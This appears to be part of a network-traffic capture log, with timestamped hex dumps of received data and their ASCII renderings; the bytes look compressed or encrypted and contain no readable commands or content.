                                                                                                                      2023-09-07 16:19:24 UTC844INData Raw: 57 b6 fd 85 0e a9 cf 50 d9 36 48 ca b6 fe 8a e9 82 01 40 0e 7d 83 f4 6d ab 31 38 ff 58 d1 1d 38 8b b6 5e 18 48 a6 25 94 15 19 50 ad d1 5f 90 30 55 80 ae 4f 27 69 a1 26 6a 8d 67 ce b3 ee 5a 30 dd ec 56 2e ea 24 7b 02 f3 0d 5c c7 0b 00 ed 88 03 d4 54 85 ee a5 1a 40 8e 41 dc af 2b ae 89 b7 59 13 18 9f c1 db 0c 1a 6a d4 f1 c2 0d f1 9d eb e5 78 0d 0d 58 c3 95 bc 06 9f 92 bd 87 76 cd 1a 74 67 b3 61 f1 03 71 68 92 f1 75 59 02 5f b5 93 d5 cf ea ab a4 5a 4c b2 8e c7 00 09 37 ba 86 d3 8f af 8d d6 c4 35 29 f4 63 a5 9d f9 73 99 eb 74 d9 5c 94 0f 9a 24 6f 67 5c d4 41 32 0e e6 b7 49 de 53 92 ab 43 93 74 64 b3 7b 0a 8b 2a de 1e 28 bb 09 6e c7 45 1d 19 5c d4 51 0c f3 70 32 7a ac be 92 55 16 44 5a 04 c0 d9 58 06 09 3d 3b 98 e1 59 62 2a af de 9a 1f ce 46 be dd de 6b f2 1e
                                                                                                                      Data Ascii: WP6H@}m18X8^H%P_0UO'i&jgZ0V.${\T@A+YjxXvtgaqhuY_ZL75)cst\$og\A2ISCtd{*(nE\Qp2zUDZX=;Yb*Fk
                                                                                                                      2023-09-07 16:19:24 UTC851INData Raw: fe 08 15 94 df 47 05 e5 32 b4 08 a8 b5 95 05 e1 ac b6 28 bf 40 ad a3 0b 1d 74 78 1b a3 8b de c6 14 8e a2 e9 30 70 04 15 bc 25 62 c2 56 62 c1 f9 02 45 31 77 d8 69 52 4d 45 87 c9 21 c4 74 00 38 92 5c 5e 56 8b 78 c5 bc d8 c6 5c 68 c3 6b 51 66 eb 6d c0 ab e5 66 d3 01 ad 37 02 34 05 2f fe f5 b6 44 23 e3 b0 64 8d 19 28 50 2c 63 42 50 2c 1c 7f 04 68 cb 23 2a 7f ba 2d b9 95 0b f3 a3 36 4d 7f 56 67 81 45 c4 87 63 34 ec 3e 2f 1c 01 3c b0 c7 6c cf 92 8e 2f 00 3b cc 2f f0 0e e9 84 3b 95 8d 68 f5 b9 50 60 7e 0b 72 b1 99 b8 0a 2a cd 55 35 92 a3 37 c8 63 08 4b ae d3 c8 69 bd 7f 1b 5f d5 b4 3f 74 c0 0f 56 a7 f8 f5 15 d9 02 bf e3 68 fd 02 81 5b 16 3f 32 17 7d 6b 88 65 47 1c fe 35 3d 2d a9 f6 75 5e 4b 92 0a 90 95 57 c9 16 8e 45 af a3 51 1b 4f 0f 6f aa 2a 90 c8 aa 00 63 64
                                                                                                                      Data Ascii: G2(@tx0p%bVbE1wiRME!t8\^Vx\hkQfmf74/D#d(P,cBP,h#*-6MVgEc4>/<l/;/;hP`~r*U57cKi_?tVh[?2}keG5=-u^KWEQOo*cd
                                                                                                                      2023-09-07 16:19:24 UTC859INData Raw: d3 e4 67 b3 11 b1 c9 58 44 d3 18 17 9f 50 df d1 33 0e 84 bf 52 03 ff e4 07 31 58 b3 1b 9e 8f 46 35 ec 3b cc db 15 d9 7b de 13 cc 02 ea 26 4d a6 e0 fd a2 fa 4e c9 92 95 21 0d 09 12 dc 1e 62 41 e6 2b d4 2c 30 30 ca 18 2d 01 5e 28 9d 10 0b e5 5d 0e 45 b6 8f 66 ae 53 1e d9 2e 00 39 04 13 19 69 b1 8b 3a 08 b4 05 dc 0c 4b ff 52 ac ee 62 ac 2e 97 dd 5d 65 ac ce d7 cd 54 3b a6 ea f3 46 f7 f3 74 96 b5 79 aa 7e 5f 3b 0f 16 5f 11 3f 0f dc 23 9e 06 9f 49 e1 de e2 13 d2 25 d2 12 b3 b4 44 60 75 02 1c d6 6d 89 1d 5d aa 1d e4 9b fa 7f 06 28 63 5e dc fa 0b b5 60 40 8b 4a ce 02 e5 23 6c d4 91 4f 74 6a 5e 64 bf 4d 72 06 a4 7a 9b 54 7d ab e4 5b a6 5c 37 dd 62 40 61 68 09 6c 94 cd bd 18 33 b9 55 be 17 bd 56 97 47 56 a7 61 4e f9 4c 14 1f 3d 74 05 ba 97 5b 98 af 00 b0 c2 74 44
                                                                                                                      Data Ascii: gXDP3R1XF5;{&MN!bA+,00-^(]EfS.9i:KRb.]eT;Fty~_;_?#I%D`um](c^`@J#lOtj^dMrzT}[\7b@ahl3UVGVaNL=t[tD
                                                                                                                      2023-09-07 16:19:24 UTC867INData Raw: 20 00 24 77 d3 0f cd f8 41 0a 28 99 41 b2 95 f6 64 3b 97 52 7d b4 1a 4d a4 b7 73 fa ab 3c a0 66 06 74 e2 88 e2 49 de 8f 27 85 ce a0 2d 0d 9d 5a 03 f6 b5 ab b8 88 ee a2 9d 68 d0 8f 4f bb 4d 3e f2 f7 54 cd 1e 4d 48 51 38 da 83 72 b4 47 e5 68 1f 4a 3d 2d 90 1d a8 0e 85 b6 45 c6 a0 c1 68 ee f3 75 23 ae f0 7c c7 bd 37 9e 74 82 22 d8 ca a0 f5 3c 8c eb 82 cb 79 ed 15 e1 7a 80 ea bf 26 7e 22 c0 13 63 e0 62 88 67 28 8b e9 45 c5 9b dc f4 fe 44 68 0f 5b 17 31 7e b8 89 c4 4c 5c 04 76 65 6e 16 7d 03 37 8b be 99 1b bc 78 73 d3 e3 c0 8d 8f 9e 5c 24 ed 28 30 5d 3b 96 82 d8 be 0a 0b cb 73 0b d9 8a 82 d6 1d 23 9d f2 e8 05 7a e5 49 1a 9e 3e 32 70 b4 b0 68 af d9 d9 dd 82 c8 9c 26 f2 3d ae ff ed d0 6d 76 b7 a0 79 82 c3 b7 85 94 b4 d0 f4 57 ea 89 59 51 cb 9e 96 a4 d0 ba 94 d7
                                                                                                                      Data Ascii: $wA(Ad;R}Ms<ftI'-ZhOM>TMHQ8rGhJ=-Ehu#|7t"<yz&~"cbg(EDh[1~L\ven}7xs\$(0];s#zI>2ph&=mvyWYQ
                                                                                                                      2023-09-07 16:19:24 UTC875INData Raw: da 83 ae c0 26 9c cf f5 b8 60 3e 3b 8a e6 73 00 0d cb c8 0d fc 73 41 1a ee ff e9 30 74 b6 4e 81 51 0c 04 7e 21 f7 d7 d9 ba 92 c8 81 7c 29 1a 82 f2 22 71 db 8a a1 31 7a 25 eb e2 a3 98 c7 04 13 9e 02 5c b2 8c 79 84 ff 92 36 a9 61 19 84 bd 91 2c ab 45 a7 2b b9 3f 7c 91 89 b4 1e 6e b9 94 4d f7 d0 e3 88 c2 8f 8c d7 f0 97 55 da 0a f7 97 14 37 af 46 f9 17 35 f8 11 6c f0 07 b9 42 08 21 23 10 60 ab ec f6 f3 b7 da b2 75 7e fe 15 dc 9f 52 5d 1e 7e eb 7f 0c 43 67 69 b8 d8 05 f5 d8 0c 01 04 6d 0e fe 31 63 70 b7 f0 8e 17 53 c4 72 03 c6 6b d4 84 94 f1 da 90 79 cd f1 aa a6 f1 aa c4 f1 ba 48 76 07 e0 c9 7f 61 ba 72 bc 7e db a7 8e d7 5b 62 bc bc 62 bc 30 f9 2f 33 12 e3 b5 36 65 bc fe 6c a7 ee 07 75 7e 59 7e 14 d2 c5 a2 81 8b 8a 42 04 e7 11 00 03 8b 62 a0 dc 80 81 1e 57 8b
                                                                                                                      Data Ascii: &`>;ssA0tNQ~!|)"q1z%\y6a,E+?|nMU7F5lB!#`u~R]~Cgim1cpSrkyHvar~[bb0/36elu~Y~BbW
                                                                                                                      2023-09-07 16:19:24 UTC883INData Raw: ed 6c b6 05 e8 d7 a7 46 5c b9 ce 49 e1 6d 80 cd ad 6c b6 d9 d8 02 a8 d7 db 03 93 10 b6 fa b3 4d 46 e7 b6 de 1e 14 2a 55 1c b0 be 0e 21 e1 ae fa 59 b0 66 3b cf d4 1b d6 3b bb eb 67 e9 eb 1f e8 af 9f 0d 4b c9 19 60 c9 23 1f 1e cd ee 6e ea 37 b0 a6 48 47 33 bd 25 68 63 cb ec 1c e0 14 4b f3 99 a7 5f 5a b0 ee fa 7e 78 f3 e6 41 13 6e 99 65 81 4a 6f 99 65 86 ba 6e 99 65 62 c6 5b 00 18 7d c5 9f 01 ce 7a 2d b7 f8 28 b2 14 a5 e0 b7 f8 20 92 8d 2a 6e 5b 31 1a d1 18 f6 b2 01 3e 0b 90 75 e1 2b 78 74 df 87 40 1e 79 cb 28 42 ff c9 ec c1 3c eb eb ee 7c 4c c5 ca cf b8 60 7b f4 80 87 55 74 c1 4b 9f 9b 95 77 7b 5c ee c0 56 cc 9b af e5 2d a8 79 ca 66 0c df 0c bd 58 5f d1 1d f9 4b 77 d3 5f 4c 4d 71 53 76 2b d0 b9 48 47 77 76 6b d3 5f 32 8c e5 f1 96 99 39 fa 7a f7 08 c5 d9 1d
                                                                                                                      Data Ascii: lF\ImlMF*U!Yf;;gK`#n7HG3%hcK_Z~xAneJoeneb[}z-( *n[1>u+xt@y(B<|L`{UtKw{\V-yfX_Kw_LMqSv+HGwvk_29z
                                                                                                                      2023-09-07 16:19:24 UTC890INData Raw: b3 e6 84 03 f7 d0 2d 54 10 da 5c 95 32 61 b7 6c 76 45 62 43 fc d2 7c 13 7f f3 63 b4 78 69 51 b7 59 fb 2d 3a 34 91 26 97 5f 88 91 c5 23 1d 3f 70 97 d6 e9 8a 0b 9e 98 f3 02 75 3a 53 eb b4 ea cf c4 0f 9c ee bd ec 21 93 cb ed 07 d4 5e 89 d2 85 f9 a6 37 a9 e7 c7 22 97 f4 5a cf 9b 46 0f d3 cd 44 bb 45 73 b1 3b 78 56 3d 88 fd c7 da ae ad 86 74 7b e9 78 f0 5e 20 45 43 38 43 9d 36 b9 61 35 39 0e 58 f6 39 1a 3d 4f 1a b0 5c 1f 25 e7 8a f3 cd 6c 94 a5 40 92 1f 81 e8 e9 4b c3 73 d6 cb 68 04 b2 e6 60 41 cd c5 50 f8 ee 9a 3d 6b e0 eb f6 f0 6d 35 7b 50 06 b2 78 7d 79 4d 78 44 cd c5 c5 e1 61 b4 fb 97 a2 ab 20 5b e7 2d 31 fa 25 01 c5 c5 69 21 61 4e 59 d5 fa be 6e 92 a6 94 83 49 8a 4b 4d e1 bf 78 fd fb 16 23 ca 2f f9 05 72 be 98 63 e4 12 d6 bc 48 cd f0 f1 1d 22 c3 be 69 78
                                                                                                                      Data Ascii: -T\2alvEbC|cxiQY-:4&_#?pu:S!^7"ZFDEs;xV=t{x^ EC8C6a59X9=O\%l@Ksh`AP=km5{Px}yMxDa [-1%i!aNYnIKMx#/rcH"ix
                                                                                                                      2023-09-07 16:19:24 UTC898INData Raw: c0 bc 93 73 c9 24 12 f9 60 f5 05 70 b5 47 bb fd 53 d1 a2 c2 9e 73 d4 8b 25 da ae 3a 7d 75 38 7c 98 1f 22 35 22 25 f7 0c a0 3b c4 12 ff 75 41 37 80 ff 0a 22 25 99 fd 08 ab 47 c3 89 81 d1 38 2a 2b 1e 41 5e de 27 6d 79 94 2e bf a2 41 78 e5 18 3a 51 1a 54 a4 f1 fb 47 35 b2 c6 66 e0 ee d1 a3 9c d4 a6 27 e9 9a bd 4a ef b0 f9 76 34 4a 51 72 c4 11 9d 4a cf e9 f4 24 77 1c e4 bd 41 22 6f 02 52 94 5c 76 90 ab 01 89 bc 16 08 07 14 2c 93 6d 22 b7 8f 47 62 54 8a 9e 66 39 35 58 14 c8 27 3a b2 11 1e a2 98 54 ed 6f 51 24 16 50 86 0d 12 1b 91 ab cb 68 2e 7c 3b 29 a3 39 c9 18 b1 c0 26 e0 4d 36 cf 53 65 ad fc 07 af 91 a4 f5 4e 11 e9 02 6c 9e 02 84 25 b0 09 07 ec 97 3b fa 14 11 4e 32 89 fa 79 63 d5 08 99 22 f2 45 04 fe 2f 40 f9 ed 2c 28 ee 46 3d ec 82 cb d0 69 34 9b 26 45 97
                                                                                                                      Data Ascii: s$`pGSs%:}u8|"5"%;uA7"%G8*+A^'my.Ax:QTG5f'Jv4JQrJ$wA"oR\v,m"GbTf95X':ToQ$Ph.|;)9&M6SeNl%;N2yc"E/@,(F=i4&E
                                                                                                                      2023-09-07 16:19:24 UTC906INData Raw: dd f5 f8 43 68 c4 ca 24 5b 26 ad 9f 59 c2 ee 9f ca dc e3 8b a6 85 c6 32 f7 94 a2 69 6b 46 2a 43 d9 fd e3 59 8e fc 15 bd 34 a6 de 60 7d bd b1 33 9b e5 c0 0f ba 36 56 da d0 fe 64 36 ab e4 91 43 26 a9 92 77 9a 15 e8 ca 36 f8 2e fe 73 e8 7e e2 f7 22 d5 5d ba c7 1f 85 f6 df 6f 5a 3f e7 ce 12 36 ef 4e 2c 3f 32 4d 67 ad 7b 17 bb eb 9e 82 ef 1b 63 c8 09 a9 35 3d a9 97 8a a8 a6 b3 bb 31 45 25 c7 1b 63 ab 08 df d0 9d a4 db c4 e6 4d 9e ca 72 fc 4a f8 0c 34 62 bc d2 56 ec 3c 13 36 15 9f 0c fd 90 fa 4b e0 70 1c 94 00 f6 f0 37 5e 05 07 b5 c0 78 24 7a 0a 58 d7 99 96 ec e6 c8 13 53 75 61 63 a4 d5 84 eb 71 ef 13 bd 78 27 9d f4 5a ba 7e 05 13 ae fa 34 10 8a 2c c0 fa f2 1f f5 e2 7d aa 59 50 e7 d4 a9 ea e4 87 11 cc 42 0b 83 66 a5 6d 10 fd 80 e6 01 d0 31 03 68 ce 22 53 0f a0
                                                                                                                      Data Ascii: Ch$[&Y2ikF*CY4`}36Vd6C&w6.s~"]oZ?6N,?2Mg{c5=1E%cMrJ4bV<6Kp7^x$zXSuacqx'Z~4,}YPBfm1h"S
                                                                                                                      2023-09-07 16:19:24 UTC914INData Raw: 01 74 20 a1 9a a8 4f 1b 9c 67 bb 54 b0 9f e1 75 df 11 5d f7 6b f7 32 89 3f fc 97 96 a0 ca d5 7a ca bb 51 bf ee f8 db c8 a6 9b 23 71 18 9f 33 b0 52 6b 3d ff d1 92 41 07 a8 f9 f0 bf 3f 3e 03 ba 3b 23 bd 23 2d 9d 89 8e bc f5 68 fa 18 42 0c b6 c6 e7 e6 3f eb 57 d4 44 49 d4 f9 bc ea 5f d0 fb 34 62 05 d8 9d a0 a8 d4 fd f9 a2 5e 6a da 1a 7b a2 75 87 d2 53 4d 50 53 c5 96 54 35 ff bb e3 8b 5d e9 fe 36 19 07 43 15 3b e8 90 2f 31 21 56 5d fc 37 46 e6 d5 8f 13 23 63 70 f3 a9 07 2d 40 cc 59 3b df 4c d6 b2 6c c0 8b 0d 89 5c 56 42 26 58 27 0d 93 4f a5 60 69 67 e5 55 c7 2a 89 9f dd a9 ed 2f f0 0e da fa c9 df 16 03 91 d4 ab e2 37 2c 56 99 d7 8a 33 64 1c 99 7f 2a 4c 9d 41 92 f5 ed 44 c3 be 53 69 d4 a5 34 a6 6a 60 63 16 0d d4 2f 61 7a 34 49 ea 38 0e fb 03 1b 9b 69 66 0f 98
                                                                                                                      Data Ascii: t OgTu]k2?zQ#q3Rk=A?>;##-hB?WDI_4b^j{uSMPST5]6C;/1!V]7F#cp-@Y;Ll\VB&X'O`igU*/7,V3d*LADSi4j`c/az4I8if
                                                                                                                      2023-09-07 16:19:24 UTC922INData Raw: b3 05 ee f3 e1 84 ee fb 40 b4 79 12 0c 85 fe fb c6 f4 75 4e c2 be 7e 2f a6 9f a7 62 c7 1d 10 40 9a 4f c6 75 dc 67 45 7a c7 f9 72 30 55 b7 48 f5 93 93 18 57 8a 95 db 75 a2 29 1b 41 dd 22 2e 41 9a 23 39 62 e7 17 34 9f 13 f2 02 7f 1e 4f 88 d5 58 bc 3c 7c 8a 76 53 26 78 7d f7 03 68 fe f3 f1 e3 70 92 5d 32 76 cd a7 c5 93 8b b5 af b7 a4 9c d7 5f 1b 79 40 b1 b0 9a 2c b4 b5 87 9e 98 4a c6 05 76 d9 33 cd a9 34 0e 8e c0 e8 2d 9f ea 66 fb e5 5d f9 a7 d0 3f f6 49 44 c2 56 9f 95 8c 1e 9b 7d 4d 8b d1 63 c8 e1 53 68 55 35 8d ae 33 30 d5 d5 9f 09 2f dd 67 6c e1 bb 71 f1 9f e1 2f 56 33 0b 29 cc 9e bc 0b d3 c1 97 fa b7 d1 45 b0 c1 ab 66 2e 45 07 ef 15 74 7b 0f dc 2a e1 e2 53 24 5b 14 9f 8a 95 2d 42 bb e6 c2 73 b2 ed b1 c7 c9 c9 f2 c0 30 9e 6f 3e a6 aa 15 8a 82 65 ba fc 06
                                                                                                                      Data Ascii: @yuN~/b@OugEzr0UHWu)A".A#9b4OX<|vS&x}hp]2v_y@,Jv34-f]?IDV}McShU530/glq/V3)Ef.Et{*S$[-Bs0o>e
                                                                                                                      2023-09-07 16:19:24 UTC929INData Raw: 57 c4 0e fb 9a e6 2f b7 04 e3 87 35 29 e6 a6 40 1a b3 b8 f8 f7 86 d3 62 e2 87 2d 11 01 c4 16 8a 97 e7 89 1f 86 c1 4e 69 a4 7b 68 a8 2f f2 86 6a 2c 06 28 24 78 01 1a f6 9a 71 e4 86 86 2d 01 33 bb be ff 7a 90 49 52 31 22 b2 df 40 03 fa 3b 62 34 07 b2 a1 2c 79 1a 9b c0 3c 66 8f ec 32 f3 7f 9f a4 02 55 c1 03 4f 6a 63 fe 17 4b 90 8a 7f 72 90 a8 38 8b 85 e8 23 2a aa 7d 85 48 cb b3 e6 10 2d c7 1b 25 6a f6 49 51 fe ec 3a 9f b9 75 ec 31 44 58 4f 56 1c c4 e3 dc ed c9 f7 00 68 8c 14 f6 26 ce ed f2 9b 0d 74 dd 80 03 12 b5 c8 5a 28 f2 a1 43 30 ad 3c 8f 53 39 69 91 21 fb 51 7a 83 c6 a0 a4 3b c6 f3 92 f4 66 21 be d9 27 de 34 d3 1b 92 1c ca b3 bc 5e 5f 73 44 2d 7d fd 1b a4 7a 96 1d f6 23 0e 3b 7c d9 0e 5f ba ab ec f4 b1 db 61 ef 7e 1a 43 15 76 3f 7f 0f 1e d4 49 15 69 bd
                                                                                                                      Data Ascii: W/5)@b-Ni{h/j,($xq-3zIR1"@;b4,y<f2UOjcKr8#*}H-%jIQ:u1DXOVh&tZ(C0<S9i!Qz;f!'4^_sD-}z#;|_a~Cv?Ii
                                                                                                                      2023-09-07 16:19:24 UTC937INData Raw: 05 43 dd 19 6f 4c 0f 72 db 46 3a 1d e5 e8 fc e0 fd 0f ba 94 ec 26 98 98 4c 90 87 8e d0 54 3e e7 06 79 6c 1f 12 95 16 7b 91 4f fc 29 ea 18 7a d1 b1 b0 6c c2 23 dd 82 37 f3 cb d6 0f c3 20 1c 0c 0d 1b 6a bf 0d 59 4a 21 cd 11 47 6f 97 4c 44 58 b6 b5 cb 91 a1 ed d4 46 a9 3b a9 3b fb 77 62 37 f3 39 22 fb d7 63 3e bc 2e 66 48 ab a9 d9 d4 5c 62 ea 2a 02 3c 37 dc 83 0e 01 90 5c 90 6c 60 d2 86 15 05 50 31 32 23 db 86 9d e8 cc b5 6a 2b d6 a1 3f 15 08 2a f9 83 23 78 0f 54 0d d5 15 04 55 a4 13 d4 9c d1 04 a5 93 53 57 f1 80 7e 33 a8 df 9c 40 12 7a 17 48 c8 b6 a9 db fc e4 ec 08 05 7d d6 6d 62 35 fb 60 5c 84 ce 19 6a 2f 87 91 0b 53 fc 6b 34 60 2e 59 0d c3 5d eb af ae 39 66 48 42 75 41 f7 72 ab 0b 71 88 57 5a c4 5e d6 01 fe f6 3f 54 f5 03 47 b6 f0 d2 5d 81 ca 6d a8 32 0c
                                                                                                                      Data Ascii: CoLrF:&LT>yl{O)zl#7 jYJ!GoLDXF;;wb79"c>.fH\b*<7\l`P12#j+?*#xTUSW~3@zH}mb5`\j/Sk4`.Y]9fHBuArqWZ^?TG]m2
                                                                                                                      2023-09-07 16:19:24 UTC945INData Raw: a8 db d5 8a 25 e0 62 fe f1 fb c9 08 76 9a 3e 79 ff e6 fe d8 d5 07 ff e9 fd 71 cb 88 4d f7 c7 2d 23 d6 de 3f 7a 19 f1 03 78 c3 da 13 59 12 3d bd 56 98 ab 6c 7a 6f 73 6a fa 2f 9f 4c 4d 3f 0b 7f e1 a7 52 d3 bb e0 6f e7 33 a9 e9 97 37 a6 a6 7f 06 7f 0f 3f 0d cf f0 97 0a ef ee 82 bf 95 f0 6e 1e e4 91 e1 ef 85 1f a7 a6 eb e7 7b e6 4a c1 8b 50 df 12 b4 a3 12 cd 00 8b 58 8f 7a 90 14 7e a8 a0 27 d5 84 08 9c 6d 0a de c0 e6 69 ea cf 27 3e 12 ea 4f 5c a0 7e 9b 6d 5c a0 2d 70 b3 51 03 46 cb 5d 17 9e ef 47 a5 1e 02 62 e5 73 11 4e 96 2b e6 5d e4 7c 91 59 0a a6 b3 64 df d4 ef 47 b6 c3 d0 d9 dc 4a 33 d0 64 1a 1e 2a 52 df a5 f4 fe d5 6a 66 21 7c 8c 9c 02 66 2d ed 64 78 a3 ab c8 98 21 76 69 da aa ad 2f 57 cf 8b d9 0f 2e 3d cf e2 d2 97 0d 85 cb 65 2f 8b 1d 3b 20 ec ae 02 55
                                                                                                                      Data Ascii: %bv>yqM-#?zxY=Vlzosj/LM?Ro37?n{JPXz~'mi'>O\~m\-pQF]GbsN+]|YdGJ3d*Rjf!|f-dx!vi/W.=e/; U
                                                                                                                      2023-09-07 16:19:24 UTC953INData Raw: 03 c0 08 cc f7 a2 60 a6 21 98 bd eb 05 98 0b 70 56 e4 6f 0a dd 8f 96 d5 89 18 84 b7 eb 18 5c 1b cd 6a c6 ac 9b 44 56 16 de ae 91 f3 7e 64 28 7c 02 29 e2 cc 7d cd 38 bb 37 ee 14 6d 89 98 39 fd 06 b5 f1 65 6a 85 40 35 23 b6 c1 c2 3b fa 49 60 c0 64 4a e3 8b 98 d8 e9 2a 38 f8 3a 9e 6c 13 fa 42 58 d7 d9 8b 8e 07 2f 60 af 6c a3 3a 22 57 c1 a1 d2 ff b8 c7 d7 f3 10 ca ff 80 86 87 ff 61 90 7a 0f 48 e8 7e 5c 41 46 30 7d 11 92 f4 b9 e0 8d 6f 21 26 ee 91 89 73 bc f9 28 42 f8 9a cf 82 ef 3a 62 df 8d 7f d3 8b 3f c9 a2 38 81 58 d1 de c0 78 16 ee 10 dd 69 82 15 b9 a0 44 78 b0 a0 1f b5 69 64 38 ba 4f 24 9c c0 c2 0b c5 37 73 05 a4 2c 3a 83 59 e7 6a 59 bd 6a e7 74 62 8b c1 09 1e df 51 94 66 6e a3 b2 2d 20 15 a7 78 b4 a3 cb e1 19 22 75 74 e6 da dd 9f 78 e6 6a 9e 25 66 ae 78
                                                                                                                      Data Ascii: `!pVo\jDV~d(|)}87m9ej@5#;I`dJ*8:lBX/`l:"WazH~\AF0}o!&s(B:b?8XxiDxid8O$7s,:YjYjtbQfn- x"utxj%fx
                                                                                                                      2023-09-07 16:19:24 UTC961INData Raw: b7 9e 4d 35 be fb 48 7a f1 ee d6 33 a9 3d d7 2f 3f c3 63 5f c3 58 0c c9 85 b2 d3 b0 a9 96 2d 73 4c 50 19 82 f0 33 84 22 87 a8 0e cb b3 08 4b 00 e4 19 0d 90 ef 67 7d 40 80 fc 38 15 e1 f7 49 2a f0 64 08 51 00 e4 3b d8 6e e0 d0 3a 5c 3a 20 6f fa 6a 48 40 9a 6f cd 74 5c 00 86 ac 51 2c a3 81 3d 15 56 52 a0 01 30 bc c0 45 3e 99 7f 81 e8 b3 a5 61 1c 6e dd 42 48 63 8d a1 5c a3 3d 0f c9 6b 48 94 ec 66 34 da 53 79 2a dc 96 da 93 1e c7 07 80 fa 70 e8 8d fa 7f 01 1f 7e 7c ea 92 f8 50 77 1e d1 10 f0 01 86 b5 35 3e de 1b a8 4d 73 06 10 3f 93 50 e4 67 1c 45 ce 51 4b 13 50 a4 b6 36 01 13 00 09 3e 43 a0 b2 33 85 67 e1 f9 ac 95 30 00 b2 40 65 2d c6 03 85 9d 43 8c b7 6c 2a 85 f1 8e b4 0c 85 25 73 ce 21 96 ec d1 51 e1 ea 8b 50 61 04 c0 6f 80 d2 7d 91 0a 90 63 ef 25 60 c1 5f
                                                                                                                      Data Ascii: M5Hz3=/?c_X-sLP3"Kg}@8I*dQ;n:\: ojH@ot\Q,=VR0E>anBHc\=kHf4Sy*p~|Pw5>Ms?PgEQKP6>C3g0@e-Cl*%s!QPao}c%`_
                                                                                                                      2023-09-07 16:19:24 UTC969INData Raw: f3 c8 9b 15 d2 33 17 39 26 7e f9 6b 20 82 59 da 59 0e bf 7f bf 2a f5 b3 7e d4 ac 5b 9b da 0d bf 8d ab 52 9f ff 0c 5f 57 a5 62 c6 c6 b5 a9 2f 7c c6 63 3f e7 b1 bf d2 62 ff c9 63 5f d2 62 7b 79 ec af b5 d8 93 3c f6 37 5a ec 09 1e bb 5e 8b ed e3 b1 2f 6b b1 fd 3c f6 15 2d f6 2b 1e bb 41 8b 3d 85 af cf a6 be f8 19 fd fc 96 ff fc ee 33 ca f2 bf 9f 51 d2 df f3 c0 57 3f 43 24 b4 4e 45 68 5a 56 7d 03 09 d7 66 ec b4 57 1d 69 46 49 d4 36 9c a2 1e a7 4f 9b 94 23 8f a3 72 8a 14 59 43 2f f3 6e 44 6b c7 ee 23 00 7b 22 00 48 03 69 d0 d8 dc d9 d2 ba 43 90 26 7c 26 35 98 17 3e 93 66 59 85 e6 41 94 6f fc fc 02 29 a7 e1 19 37 4f f9 73 d6 57 7c 52 8e 0c ac 47 73 68 96 57 37 23 d2 3b 95 77 e4 98 72 c9 72 41 53 13 5a de 36 11 45 ba 9e 80 49 96 31 79 dc 83 d5 13 56 91 26 ee 3d
                                                                                                                      Data Ascii: 39&~k YY*~[R_Wb/|c?bc_b{y<7Z^/k<-+A=3QW?C$NEhZV}fWiFI6O#rYC/nDk#{"HiC&|&5>fYAo)7OsW|RGshW7#;wrrASZ6EI1yV&=
                                                                                                                      2023-09-07 16:19:24 UTC976INData Raw: 04 66 17 76 49 95 47 d1 30 a1 fd 18 e0 92 43 b2 77 c2 cf 1c c9 7e 08 7e e6 a2 9d 63 40 30 c9 ae c8 f6 5e 24 6c 45 ea c8 fb 4b c9 26 71 64 77 48 44 9b ab f6 e3 40 f7 6b 15 21 94 19 30 00 66 3a d0 86 10 ab 3d ca ec 9d b6 e8 52 93 ed 4c 1d 9a c3 47 ab 0b 8a cd 7e 08 02 76 d4 19 99 fd 50 a9 a3 0b ad ea 75 d9 3e 80 f8 0f 98 a3 cb f8 ae 34 07 2d ca 48 e5 26 e3 4e e9 b6 f9 c5 7f 96 ca cd f7 2a 13 9e d2 a8 9b e6 df c3 e7 3f 30 09 4d d6 29 73 0e 89 e4 c3 22 ca d2 18 ba f9 60 fb d4 03 34 29 dd c9 93 f2 e6 61 34 29 09 72 99 3e 40 f8 4a d9 20 f4 5c ef 3f 04 c5 28 19 87 50 78 67 c2 3b d5 9f 43 30 95 ad 9c 3a 18 0b 7c 1f 02 b1 fc 58 e1 ce e4 c2 df 37 f3 c2 1f 83 b1 7d d8 0c f1 93 c8 95 c2 34 8c 2f 83 f8 d7 78 3c 9b 61 f5 3a 35 72 50 7d 6f 82 bd a4 e5 bd 39 86 44 7b 63
                                                                                                                      Data Ascii: fvIG0Cw~~c@0^$lEK&qdwHD@k!0f:=RLG~vPu>4-H&N*?0M)s"`4)a4)r>@J \?(Pxg;C0:|X7}4/x<a:5rP}o9D{c
                                                                                                                      2023-09-07 16:19:24 UTC984INData Raw: 5a 79 79 22 b9 c8 b7 3d b5 18 d5 e8 e6 b3 2d a4 a9 9a c6 2a 50 53 35 0b 58 6d ef 9f 0c ea 7e bc 05 bc 72 27 4d 5e d4 5b 28 41 f1 3d 56 2b af 46 65 17 65 c1 44 ea 9f 6d 75 05 6a 27 8c d5 0a 01 3a 83 85 98 b5 42 3a 13 0a 49 a2 b7 4a e2 f8 e7 78 2e 21 a0 3d a6 6c 77 03 b8 6b ad 30 35 e6 c2 1a 07 f4 76 a5 a0 53 75 87 b5 a4 ba c2 12 41 55 60 d8 95 65 22 7d d8 cf 77 74 1c 53 8e 01 b4 91 08 fd cf 27 ea 25 cf 8d e7 ef 4f 38 37 c6 2c 90 fe 0d 34 61 72 9f 8c 4a d6 c7 56 76 29 1b a6 d1 16 f9 de 86 23 21 df 20 fd e9 41 18 77 99 56 98 bd d7 e9 9f 49 f8 ff 02 52 2f 2b 97 47 21 0d f3 e9 02 a9 df fe c0 20 f4 88 e1 ba 92 94 10 2d db 7d 50 68 63 ae 65 cb 97 3a 9a dd 3c d3 30 d4 f5 79 58 ba 07 c9 37 69 57 d7 58 7d 91 7c 13 0f 47 57 c4 15 a8 0b fc fb 27 e9 ca cd 6c 5f 38 9a
                                                                                                                      Data Ascii: Zyy"=-*PS5Xm~r'M^[(A=V+FeeDmuj':B:IJx.!=lwk05vSuAU`e"}wtS'%O87,4arJVv)#! AwVIR/+G! -}Phce:<0yX7iWX}|GW'l_8
